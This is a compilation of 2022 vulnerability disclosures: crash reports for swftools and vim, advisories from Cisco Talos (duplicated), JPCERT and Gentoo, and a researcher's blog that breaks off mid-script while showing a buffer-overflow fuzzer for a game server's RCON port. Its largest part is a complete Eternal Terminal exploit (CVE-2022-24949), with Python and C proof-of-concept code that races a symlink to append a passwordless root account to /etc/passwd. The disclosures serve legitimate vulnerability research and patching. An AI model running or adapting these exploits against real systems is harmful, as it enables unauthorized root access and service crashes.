      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==39505==ABORTING
    

**reproduce**

command to reproduce the crash : ./png2swf -j 50 \[sample file\] -o /dev/null

**sample file**

id16\_heap-buffer-overflow.zip

**crash info**

    ==29029==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000001b8 at pc 0x000000552ceb bp 0x7ffc959816f0 sp 0x7ffc959816e8
    READ of size 4 at 0x6020000001b8 thread T0
    ==29029==WARNING: failed to fork (errno 12)
    ==29029==WARNING: failed to fork (errno 12)
    ==29029==WARNING: failed to fork (errno 12)
    ==29029==WARNING: failed to fork (errno 12)
    ==29029==WARNING: failed to fork (errno 12)
    ==29029==WARNING: Failed to use and restart external symbolizer!
        #0 0x552cea  (/home/bupt/Desktop/swftools/build/bin/png2swf+0x552cea)
        #1 0x4fac8f  (/home/bupt/Desktop/swftools/build/bin/png2swf+0x4fac8f)
        #2 0x4fd5f5  (/home/bupt/Desktop/swftools/build/bin/png2swf+0x4fd5f5)
        #3 0x7f324745ac86  (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
        #4 0x41ce29  (/home/bupt/Desktop/swftools/build/bin/png2swf+0x41ce29)
    
    0x6020000001b8 is located 4 bytes to the right of 4-byte region [0x6020000001b0,0x6020000001b4)
    allocated by thread T0 here:
        #0 0x4af3f0  (/home/bupt/Desktop/swftools/build/bin/png2swf+0x4af3f0)
        #1 0x55014c  (/home/bupt/Desktop/swftools/build/bin/png2swf+0x55014c)
        #2 0x4fac8f  (/home/bupt/Desktop/swftools/build/bin/png2swf+0x4fac8f)
        #3 0x4fd5f5  (/home/bupt/Desktop/swftools/build/bin/png2swf+0x4fd5f5)
        #4 0x7f324745ac86  (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/bupt/Desktop/swftools/build/bin/png2swf+0x552cea) 
    Shadow bytes around the buggy address:
      0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff8000: fa fa fd fd fa fa fd fa fa fa fd fd fa fa fd fd
      0x0c047fff8010: fa fa fd fd fa fa fd fa fa fa fd fd fa fa fd fd
      0x0c047fff8020: fa fa fd fd fa fa 03 fa fa fa fd fd fa fa fd fd
    =>0x0c047fff8030: fa fa fd fd fa fa 04[fa]fa fa fa fa fa fa fa fa
      0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    

**SEGV****reproduce**

command to reproduce the crash : ./png2swf -j 50 \[sample file\] -o /dev/null

**sample file**

id12\_SEGV.zip

**crash info**

    AddressSanitizer:DEADLYSIGNAL
    
    ==30779==ERROR: AddressSanitizer: SEGV on unknown address 0x7f62129fc800 (pc 0x000000550c36 bp 0x7ffc5ce7ea10 sp 0x7ffc5ce7e780 T0)
    ==30779==The signal is caused by a READ memory access.
        #0 0x550c36 in png_load /home/bupt/Desktop/swftools/lib/png.c:801:17
        #1 0x4fac8f in MovieAddFrame /home/bupt/Desktop/swftools/src/png2swf.c:476:6
        #2 0x4fd5f5 in main /home/bupt/Desktop/swftools/src/png2swf.c:822:10
        #3 0x7f6316332c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
        #4 0x41ce29 in _start (/home/bupt/Desktop/swftools/build/bin/png2swf+0x41ce29)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/bupt/Desktop/swftools/lib/png.c:801:17 in png_load
    ==30779==ABORTING

CVE-2022-35105: bug found in swftools-png2swf · Issue #183 · matthiaskramm/swftools

Dave McDaniel of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw. 
Cisco Talos recently discovered three vulnerabilities in a library that works with the HDF5 file format that could allow an attacker to execute remote code on a targeted device. 
These issues arise in the libhdf5 gif2h5 tool that’s normally used to convert a GIF file to the HDF5 format, commonly used to store large amounts of numerical data. An attacker could exploit these vulnerabilities by tricking a user into opening a specially crafted, malicious file. 
TALOS-2022-1485 (CVE-2022-25972) and TALOS-2022-1486 (CVE-2022-25942) are out-of-bounds write vulnerabilities in the gif2h5 tool that trigger a specific crash, opening the door for code execution from the adversary. TALOS-2022-1487 (CVE-2022-26061) works similarly but is a heap-based buffer overflow vulnerability. 

Cisco Talos is disclosing these vulnerabilities despite no official fix from HDF5 in adherence to the 90-day deadline outlined in Cisco’s vulnerability disclosure policy. 


Users are encouraged to update these affected products as soon as possible: HDF5 Group libhdf5, version 1.10.4. Talos tested and confirmed these versions of the library could be exploited by these vulnerabilities. 
The following Snort rules will detect exploitation attempts against this vulnerability: 59296, 59297, 59300, 59301, 59303 and 59304. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

_Dave McDaniel of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw._ 

Cisco Talos recently discovered three vulnerabilities in a library that works with the HDF5 file format that could allow an attacker to execute remote code on a targeted device. 

These issues arise in the libhdf5 gif2h5 tool that’s normally used to convert a GIF file to the HDF5 format, commonly used to store large amounts of numerical data. An attacker could exploit these vulnerabilities by tricking a user into opening a specially crafted, malicious file.

TALOS-2022-1485 (CVE-2022-25972) and TALOS-2022-1486 (CVE-2022-25942) are out-of-bounds write vulnerabilities in the gif2h5 tool that trigger a specific crash, opening the door for code execution from the adversary. TALOS-2022-1487 (CVE-2022-26061) works similarly but is a heap-based buffer overflow vulnerability. 

Cisco Talos is disclosing these vulnerabilities despite no official fix from HDF5 in adherence to the 90-day deadline outlined in Cisco’s vulnerability disclosure policy. 

Users are encouraged to update these affected products as soon as possible: HDF5 Group libhdf5, version 1.10.4. Talos tested and confirmed these versions of the library could be exploited by these vulnerabilities. 

The following Snort rules will detect exploitation attempts against this vulnerability: 59296, 59297, 59300, 59301, 59303 and 59304. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Vulnerability Spotlight: Three vulnerabilities in HDF5 file format could lead to remote code execution 

OS command injection vulnerability in Nintendo Wi-Fi Network Adaptor WAP-001 All versions allows an attacker with an administrative privilege to execute arbitrary OS commands via unspecified vectors.

Published:2022/07/29  Last Updated:2022/07/29

**Overview**

Nintendo Wi-Fi Network Adaptor WAP-001 provided by Nintendo Co.,Ltd. contains multiple vulnerabilities.

**Products Affected**

*   Nintendo Wi-Fi Network Adaptor WAP-001 all versions

**Description**

Nintendo Wi-Fi Network Adaptor provided by Nintendo Co.,Ltd. contains multiple vulnerabilities listed below.

*   **OS command injection (CWE-78)** - CVE-2022-36381
    
    CVSS v3
    
    CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    
    **Base Score: 6.8**
    
    CVSS v2
    
    AV:A/AC:L/Au:S/C:P/I:P/A:P
    
    **Base Score: 5.2**
    
*   **Buffer overflow (CWE-121)** - CVE-2022-36293
    
    CVSS v3
    
    CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    
    **Base Score: 6.8**
    
    CVSS v2
    
    AV:A/AC:L/Au:S/C:P/I:P/A:P
    
    **Base Score: 5.2**
    

**Impact**

*   A user who can access the administrative page of the product may execute an arbitrary OS command - CVE-2022-36381
*   A user who can access the administrative page of the product may execute an arbitrary code - CVE-2022-36293

**Solution**

**Stop using the product**  
The developer states that the product is no longer supported, therefore recommends users to stop using the product.

**Vendor Status**

**References**

**JPCERT/CC Addendum**

**Vulnerability Analysis by JPCERT/CC**

**Credit**

Taizoh Tsukamoto of Mitsui Bussan Secure Directions, Inc reported these vulnerabilities to IPA.  
JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.

**Other Information**

CVE-2022-36381: Multiple vulnerabilities in Nintendo Wi-Fi Network Adaptor WAP-001

A privilege escalation to root exists in Eternal Terminal prior to version 6.2.0. This is due to the combination of a race condition, buffer overflow, and logic bug all in PipeSocketHandler::listen().

**Vulnerability Description:**

An authenticated attacker can send a crafted packet to an Eternal Terminal server which allows them to change the ownership permissions on an arbitrary file. This can be leveraged to gain root privileges on the server.

This was due to a combination of a race condition and a buffer overflow in PipeSocketHandler::listen() as well as a logic bug in the PortForwardHandler:createSource().

The logic bug: If you send a crafted InitialPayload packet containing a PortForwardSourceRequest and arbitrary SocketEndpoint you can invoke a call to PipeSocketHandler::listen() with the arbitrary SocketEndpoint. The name member variable of the SocketEndpoint is used by several system calls in PipeSocketHandler::listen() including unlink(), resulting in arbitrary file delete.

The race condition: Inside PipeSocketHandler::listen(), there are subsequent calls to unlink(), bind(), chmod(), and chown(), to the provided name member variable of SocketEndpoint without verifying the path. If an attacker can modify the file pointed to by the provided name variable (through symlink manipulation for example) between bind() and chmod()/chown(), they can arbitrarily change a file's permission and ownership. I was able to utilize this vulnerability to arbitrarily change the permissions on /etc/passwd, thus resulting in a root privilege escalation. However I found the race condition by itself was not reliable.

The buffer overflow: Inside PipeSocketHandler::listen(), there are no bounds checks on a strcpy() which takes the provided name variable and copies it into the local.sun_path member variable of a socket. The maximum path length for this field is 108 characters, but there is no limit on the size of the name variable, allowing for a stack-based buffer overflow. This could be utilized in a traditional memory corruption exploit (i.e. overwriting return addresses and controlling code execution), but would require additional work in order to prevent failure during the function and the epilog of the function (i.e. the fd variable needs to be valid for bind() and listen(), the pipePath variable needs to point to a crafted fake chunk in order to be freed properly during the function epilog). In this case I abused a discrepancy between path handling in bind(), where it truncates the provided path to 108 characters even if the member variable is longer. By overflowing the local.sun_path I can have the the bind() call point to a different path, which prevents a failure if the file already exists.

In the final exploit I use the name variable of /../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/aaa/etc/passwd, and the race utility creates a large file for unlink in order to improve race condition reliability. In order to run the proof of concept compile the .proto file with protoc, compile the race utility statically for your target and run it locally on the target, and run the python script remotely against the target. This will change the ownership of /etc/passwd on the target machine and create the user root2 which does not require a password to login to.

**Proof of Concept:**

This python file should be run remotely against the ET target.

    #!/usr/bin/env python3
    
    import argparse
    import struct
    import time
    import socket
    import paramiko
    import ET_pb2
    
    PROTOCOL_VERSION = 6
    INITIAL_PAYLOAD = 253
    HEADER_SIZE = 2
    
    parser = argparse.ArgumentParser(description='[*] Root privesc exploit for Eternal Terminal, \
                                                  assumes SSH access to box')
    parser.add_argument('host',type=str,help='target machine')
    parser.add_argument('user',type=str,help='user to SSH as')
    parser.add_argument('--etport',type=int,default='2022',help='port ET is running on')
    parser.add_argument('--sshport',type=int,default='22',help='port SSH is running on')
    parser.add_argument('--racepath',type=str,default='./race',help='location of race utility')
    args = parser.parse_args()
    
    #Initializes SSH/SFTP connection
    def initialize_ssh_connection(host, user, ssh_port):
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        ssh.connect(host,ssh_port,username=user,timeout=4)
        return ssh
    
    def initiate_client_connection(id, connection):
        #Craft request
        connect_request = ET_pb2.ConnectRequest()
        connect_request.clientId = id
        connect_request.version = PROTOCOL_VERSION
    
        request = connect_request.SerializeToString()
        length = struct.pack('l', len(request))
        #Send Request
        connection.sendall(length)
        connection.sendall(request)
    
    # Send static initial payload, this was pulled from a client communication but could be
    # dynamically constructed as well
    def send_initial_payload(connection, key):
        """
    [INFO 2021-10-27 08:35:43,553 client-main BackedWriter.cpp:17] Hexdump of payload
    000000: 00 00 00 94 01 fd 5f f2 04 d1 66 43 5a 64 44 1e  ......_...fCZdD.
    000010: 54 8f c8 fa 3f 4f 8a e9 c2 03 a0 86 0a 51 cb 37  T...?O.......Q.7
    000020: 7d 95 10 0f 64 8b 2b 1a 2c 7c ac 79 df f9 8b 50  }...d.+.,|.y...P
    000030: 15 7e 5a 5e fb d7 3a 81 65 66 aa 21 80 56 9b 67  .~Z^..:.ef.!.V.g
    000040: 8b be 1a fd 85 2e 90 ee 16 46 e8 c7 17 23 a2 d5  .........F...#..
    000050: 27 0c 1d 9c ae fe 3b 47 2b 0f 09 3e a6 31 f9 6d  '.....;G+..>.1.m
    000060: ee df c1 65 63 55 26 ae e5 11 5d a9 df 15 d7 45  ...ecU&...]....E
    000070: 12 a4 df 3e 8f 40 54 51 ab 2c 8a 0d 88 ae 3d 44  ...>.@TQ.,....=D
    000080: c5 0c 2a c5 0a bc 60 48 df 01 f8 70 fb be dc 62  ..*...`H...p...b
    000090: cb 36 a4 42 11 5c fc ac                          .6.B.\..
    
        #Example python code which would generate the payload
        initial_payload = ETerminal_pb2.InitialPayload()
        initial_payload.jumphost = False
        port_forward_source_request = ETerminal_pb2.PortForwardSourceRequest()
        source = ET_pb2.SocketEndpoint()
        destination = ET_pb2.SocketEndpoint()
        sourcePath = '/../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/aaa/etc/passwd'
        destinationPath = '/tmp/test'
        source.name = sourcePath
        destination.name = destinationPath
        port_forward_source_request.source.CopyFrom(source)
        port_forward_source_request.destination.CopyFrom(destination)
        #initial_payload.reversetunnels = [port_forward_source_request]
        initial_payload.reversetunnels.append(port_forward_source_request)
        serialized_payload = initial_payload.SerializeToString()
    """
    
        packet = bytes.fromhex("00 00 00 94 01 fd 5f f2 04 d1 66 43 5a 64 44 1e 54 \
        8f c8 fa 3f 4f 8a e9 c2 03 a0 86 0a 51 cb 37 7d 95 10 0f 64 8b 2b 1a 2c 7c \
        ac 79 df f9 8b 50 15 7e 5a 5e fb d7 3a 81 65 66 aa 21 80 56 9b 67 8b be 1a \
        fd 85 2e 90 ee 16 46 e8 c7 17 23 a2 d5 27 0c 1d 9c ae fe 3b 47 2b 0f 09 3e \
        a6 31 f9 6d ee df c1 65 63 55 26 ae e5 11 5d a9 df 15 d7 45 12 a4 df 3e 8f \
        40 54 51 ab 2c 8a 0d 88 ae 3d 44 c5 0c 2a c5 0a bc 60 48 df 01 f8 70 fb be \
        dc 62 cb 36 a4 42 11 5c fc ac")
        connection.sendall(packet)
    
    if __name__ == "__main__":
        #Initialize SSH/SFTP connection
        print("[*] Initializing SSH connection")
        ssh = initialize_ssh_connection(args.host, args.user, args.sshport)
        print("[*] Initializing SFTP connection")
        sftp = initialize_ssh_connection(args.host, args.user, args.sshport).open_sftp()
    
    
        #Clean up previous race binary
        print("[*] Cleaning up previous race binary")
        stdin, stdout, stderr = ssh.exec_command('rm -rf ~/race')
        exit_status = stdout.channel.recv_exit_status()
        #print(stdout.read().splitlines())
    
        print("[*] Killing previous race processes")
        stdin, stdout, stderr = ssh.exec_command('pkill race')
        exit_status = stdout.channel.recv_exit_status()
    
        #Get home directory
        print("[*] Getting home directory")
        stdin, stdout, stderr = ssh.exec_command('echo $HOME')
        exit_status = stdout.channel.recv_exit_status()
        home = stdout.read().splitlines()[0].decode('utf-8')
    
        #Copy new binary over
        print("[*] Copying new race binary over")
        sftp.put(args.racepath, f'{home}/race')
    
        #Run race binary
        print("[*] Running race utility in background")
        stdin, stdout, stderr = ssh.exec_command(f'chmod +x {home}/race && {home}/race&')
        exit_status = stdout.channel.recv_exit_status()
        #TODO: modify to wait for return from race binary to create 2.0G passwd file
        time.sleep(5)
    
        #Registering random id/key
        print("[*] Registering id/key on ET server")
        id = '25F81F3CC230D45B'
        key = 'E59AD03E34FC3AB9DED568F47EA27677'
        cmd = f'echo \'{id}/{key}_xterm-256color\n\' | etterminal&'
        stdin, stdout, stderr = ssh.exec_command(cmd)
        exit_status = stdout.channel.recv_exit_status()
        stdout.read().splitlines()
    
        #Setup ET socket connetion
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as connection:
    
            connection.connect((args.host, args.etport))
            print("[*] Initiating client connection")
            initiate_client_connection(id, connection) #TerminalClient.cpp:140
            print("[*] Sending payload")
            send_initial_payload(connection, key)
            print("[*] You can log in as root2 on the target machine without a password, try it!")
    

This C file should be compiled statically and run locally on the target server.

    #include <sys/inotify.h>
    #include <stdio.h>
    #include <unistd.h>
    #include <stdlib.h>
    #include <signal.h>
    #include <fcntl.h>
    #include <string.h>
    #include <sys/stat.h>
    #include <sys/types.h>
    
    #define EVENT_SIZE  ( sizeof (struct inotify_event) ) /*size of one event*/
    #define MAX_EVENTS 4096/* Maximum number of events to process*/
    #define LEN_NAME 4  /* Assuming that the length of the filename */
    #define BUF_LEN     ( MAX_EVENTS * ( EVENT_SIZE + LEN_NAME ))
    
    int fd,wd;
    void sig_handler(int sig){
           inotify_rm_watch( fd, wd );
           close( fd );
           exit( 0 );
    }
    
    int main(int argc, char *argv[])
    {
    	//Cleanup previous exploit attempts
    	printf("[*] Cleaning up previous exploit attempts\n");
    	system("/bin/rm -rf /tmp/aaa");
    	system("mkdir -p /tmp/aaa/etc");
    	system("touch /tmp/aaa/etc/passwd");
    	printf("[*] Making large file for unlink race\n");
    	system("yes | dd of=/tmp/aaa/etc/passwd bs=1M iflag=fullblock count=2048");
    
        // watch the tmp/aaa/etc folder for the creation of the socket file
        char *path = "/tmp/aaa/etc";
        signal(SIGINT,sig_handler);
    
        fd = inotify_init();
    
        if (fcntl(fd, F_SETFL, O_NONBLOCK) < 0)
        exit(2);
    
        wd = inotify_add_watch(fd,path,IN_DELETE);
        if(wd==-1){
    	printf("Could not watch\n");
        }
        else {
    	printf("Watching...\n");
        }
    
        while(1) {
    	int i=0, length;
    	char buffer[BUF_LEN];
    
    	length = read(fd,buffer,BUF_LEN);
    
    	while(i<length){
    	    struct inotify_event *event = (struct inotify_event *) &buffer[i];
    		if(event->len){
    		    if (strcmp(event-> name,"passwd") == 0) {
    			if ( event->mask & IN_DELETE ) {
    			    rename("/tmp/aaa/etc", "/tmp/aaa/etcc");
    			    symlink("/etc", "/tmp/aaa/etc");
    
    			    printf("[*] Waiting to overwrite /etc/passwd\n");
    			    int i = 0;
    			    while(i < 3) {
    
    				if (access("/etc/passwd", W_OK)  == 0) {
    				    // Add malicious entry to passwd and login as user
    				    printf("[*] Adding entry root2 with no password");
    				    char * entry = "root2::0:0:root:/root:/bin/bash";
    				    FILE * pFile = fopen("/etc/passwd", "a");
    				    fprintf(pFile, entry);
    				    fclose(pFile);
    				    exit(1);
    				}
    				printf("[*] Waiting...\n");
    				sleep(1);
    				i = i + 1;
    			    }
    			    printf("[*] Something went wrong, try again!\n");
    			    exit(-1);
    			}
    			}
    		    
    		    i += EVENT_SIZE + event->len;
    		}
    	}
    }
    }
    

This protobuf file should be compiled using protoc and used as a reference for the python file.

    //ET.proto
    syntax = "proto2";
    package et;
    option optimize_for = LITE_RUNTIME;
    
    enum EtPacketType {
      // Count down from 254 to avoid collisions
      HEARTBEAT = 254;
      INITIAL_PAYLOAD = 253;
      INITIAL_RESPONSE = 252;
    }
    
    message ConnectRequest {
      optional string clientId = 1;
      optional int32 version = 2;
    }
    
    enum ConnectStatus {
      NEW_CLIENT = 1;
      RETURNING_CLIENT = 2;
      INVALID_KEY = 3;
      MISMATCHED_PROTOCOL = 4;
    }
    
    message ConnectResponse {
      optional ConnectStatus status = 1;
      optional string error = 2;
    }
    
    message SequenceHeader { optional int32 sequenceNumber = 1; }
    
    message CatchupBuffer { repeated bytes buffer = 1; }
    
    message SocketEndpoint {
      optional string name = 1;
      optional int32 port = 2;
    }
    

**Timeline:**

10/29/21: Vulnerabilities were disclosed to author of ET  
11/3/21: Partial fixes for the most serious issues to ET were released (including this one)  
1/27/22: 90 day deadline for public disclosure reached

CVE-2022-24949: Eternal Terminal Root Privilege Escalation

Gentoo Linux Security Advisory 202208-21 - A heap-based buffer overflow in libeml might allow attackers to execute arbitrary code. Versions less than 1.4.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202208-21  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: libebml: Heap buffer overflow vulnerability  
     Date: August 14, 2022  
     Bugs: #772272  
       ID: 202208-21

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A heap-based buffer overflow in libeml might allow attackers to execute  
arbitrary code.

Background  
=========  
libebml is a C++ library to parse EBML files.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  dev-libs/libebml           < 1.4.2                      >= 1.4.2

Description  
==========  
On 32bit builds of libebml, the length of a string is miscalculated,  
potentially leading to an exploitable heap overflow.

Impact  
=====  
An attacker able to provide arbitrary input to libebml could achieve arbitrary code execution.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
Users of libebml on 32 bit architectures should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-libs/libebml-1.4.2"

References  
=========  
[ 1 ] CVE-2021-3405  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3405

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202208-21

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202208-21

Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.0210.

**Description**

Heap-based Buffer Overflow in function compile\_lock\_unlock at vim/src/vim9cmds.c:196

#vim version

     git log
    commit 326c5d36e7cb8526330565109c17b4a13ff790ae (grafted, HEAD -> master, tag: v9.0.0194, origin/master, origin/HEAD)
    

**Proof of Concept**

    ./vim -u NONE -X -Z -e -s -S poc2_hbo_M.dat -c :qa!
    =================================================================
    ==47794==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000061b6 at pc 0x5571726b8dac bp 0x7ffcc9cd79d0 sp 0x7ffcc9cd79c0
    READ of size 1 at 0x6020000061b6 thread T0
        #0 0x5571726b8dab in compile_lock_unlock /home/fuzz/vim/src/vim9cmds.c:196
        #1 0x5571721cc5c1 in ex_unletlock /home/fuzz/vim/src/evalvars.c:1935
        #2 0x5571726b944a in compile_unletlock /home/fuzz/vim/src/vim9cmds.c:263
        #3 0x5571726d7cf3 in compile_def_function /home/fuzz/vim/src/vim9compile.c:3172
        #4 0x5571726af7f9 in ex_defcompile /home/fuzz/vim/src/userfunc.c:5098
        #5 0x55717220a640 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2570
        #6 0x5571722018e3 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:992
        #7 0x557172524865 in do_source_ext /home/fuzz/vim/src/scriptfile.c:1674
        #8 0x557172525997 in do_source /home/fuzz/vim/src/scriptfile.c:1801
        #9 0x557172522526 in cmd_source /home/fuzz/vim/src/scriptfile.c:1174
        #10 0x55717252258b in ex_source /home/fuzz/vim/src/scriptfile.c:1200
        #11 0x55717220a640 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2570
        #12 0x5571722018e3 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:992
        #13 0x5571721ffc7d in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:586
        #14 0x5571727fba30 in exe_commands /home/fuzz/vim/src/main.c:3133
        #15 0x5571727f4b9e in vim_main2 /home/fuzz/vim/src/main.c:780
        #16 0x5571727f4456 in main /home/fuzz/vim/src/main.c:432
        #17 0x7f5407af7082 in __libc_start_main ../csu/libc-start.c:308
        #18 0x557172081e4d in _start (/home/fuzz/vim/src/vim+0x139e4d)
    
    0x6020000061b6 is located 0 bytes to the right of 6-byte region [0x6020000061b0,0x6020000061b6)
    allocated by thread T0 here:
        #0 0x7f5407f8e808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
        #1 0x55717208228a in lalloc /home/fuzz/vim/src/alloc.c:246
        #2 0x55717208207b in alloc /home/fuzz/vim/src/alloc.c:151
        #3 0x5571725b754d in vim_strsave /home/fuzz/vim/src/strings.c:27
        #4 0x5571726d609c in compile_def_function /home/fuzz/vim/src/vim9compile.c:2889
        #5 0x5571726af7f9 in ex_defcompile /home/fuzz/vim/src/userfunc.c:5098
        #6 0x55717220a640 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2570
        #7 0x5571722018e3 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:992
        #8 0x557172524865 in do_source_ext /home/fuzz/vim/src/scriptfile.c:1674
        #9 0x557172525997 in do_source /home/fuzz/vim/src/scriptfile.c:1801
        #10 0x557172522526 in cmd_source /home/fuzz/vim/src/scriptfile.c:1174
        #11 0x55717252258b in ex_source /home/fuzz/vim/src/scriptfile.c:1200
        #12 0x55717220a640 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2570
        #13 0x5571722018e3 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:992
        #14 0x5571721ffc7d in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:586
        #15 0x5571727fba30 in exe_commands /home/fuzz/vim/src/main.c:3133
        #16 0x5571727f4b9e in vim_main2 /home/fuzz/vim/src/main.c:780
        #17 0x5571727f4456 in main /home/fuzz/vim/src/main.c:432
        #18 0x7f5407af7082 in __libc_start_main ../csu/libc-start.c:308
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/fuzz/vim/src/vim9cmds.c:196 in compile_lock_unlock
    Shadow bytes around the buggy address:
      0x0c047fff8be0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff8bf0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff8c00: fa fa 00 00 fa fa 00 00 fa fa 05 fa fa fa fd fa
      0x0c047fff8c10: fa fa fd fa fa fa 00 05 fa fa 06 fa fa fa 02 fa
      0x0c047fff8c20: fa fa 00 05 fa fa fd fa fa fa 02 fa fa fa fd fa
    =>0x0c047fff8c30: fa fa 02 fa fa fa[06]fa fa fa fa fa fa fa fa fa
      0x0c047fff8c40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8c50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8c60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8c70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==47794==ABORTING
    
    

<p><a href="https://github.com/Janette88/vim/blob/main/poc2\_hbo\_M.dat">poc2\_hbo\_M.dat</a></p>

**Impact**

This vulnerabilities are capable of crashing software, Modify Memory, and possible remote execution.

CVE-2022-2819: Heap-based Buffer Overflow in function compile_lock_unlock in vim/vim in vim

A buffer overflow in the FTcpListener thread in The Isle Evrima (the dedicated server on Windows and Linux) 0.9.88.07 before 2022-08-12 allows a remote attacker to crash any server with an accessible RCON port, or possibly execute arbitrary code.

**Discovering a Buffer Overflow in The Isle Evrima Dedicated Server**

The CVE program has assigned CVE ID: CVE-2022-38221 for this exploit. You can view it here.

So I’ve been playing this game on steam, The Isles. Great game, but I like to host my own servers when I can. So I downloaded the dedicated server, booted it up and it was running. I took a look at the patch notes and noticed RCON had been introduced, but wasn’t implemented yet. I took a look at the official discord, and not much info was there. So I took to doing a little reverse engineering and came up with the first public The Isles Evrima python client, which can be found here. I’m a tinkerer by nature, so I wanted to take a closer look at how the information was handled. After all, I’m running this server, the game is still in development, so I wanted to see how secure I was. I didn’t think I would find a buffer overflow on the Isle Evrima.

**Finding the vulnerability**

I decided what any security researcher would do, and sent a bunch of bytes to the RCON server. And…Nothing. So I decided to wrap the buffer into the password command, and that’s where things got interesting. So I ran the following python code, which encases a 200,000 byte buffer into the password field, and send it over to RCON running on port 8888.

    import socket, time, sys
    
    ip = "127.0.0.1"
    port = 8888
    timeout = 10
    string = "A" * 200000
    while True:
      try:
